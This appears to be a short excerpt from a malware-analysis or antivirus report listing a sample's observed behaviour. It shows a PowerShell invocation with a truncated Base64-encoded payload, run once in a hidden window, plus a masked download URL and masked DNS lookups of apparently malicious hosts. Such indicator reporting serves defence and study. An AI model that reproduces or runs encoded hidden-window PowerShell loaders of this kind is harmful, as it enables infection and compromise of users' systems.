Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABCAGcAYQBvAHAAaABmAHoAYwB5AD0AJwBMAHIAZwBhAHkAawBjAHQAcwBmAHkAJwA7ACQAWQB4AHIAeAB3AGEAeABjAHcAZwBlACAAPQAgACcANQA2ADIAJwA7ACQAVQBiAGkAcAB6AGQAZwByAD0AJwBNAGgAbgBqAGYAcAB3AHoAawAnADsAJAB...
- http://ma##.pollub.pl/sota2018/gallery/resources/cache/uPGLXGH/
- DNS ASK ma##.pollub.pl
- DNS ASK hi####ompany.com
- DNS ASK de##love.in
- DNS ASK ad####erior.co.in
- DNS ASK ci###.com.ar
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABCAGcAYQBvAHAAaABmAHoAYwB5AD0AJwBMAHIAZwBhAHkAawBjAHQAcwBmAHkAJwA7ACQAWQB4AHIAeAB3AGEAeABjAHcAZwBlACAAPQAgACcANQA2ADIAJwA7ACQAVQBiAGkAcAB6AGQAZwByAD0AJwBNAGgAbgBqAGYAcAB3AHoAawAnADsAJAB...' (with hidden window)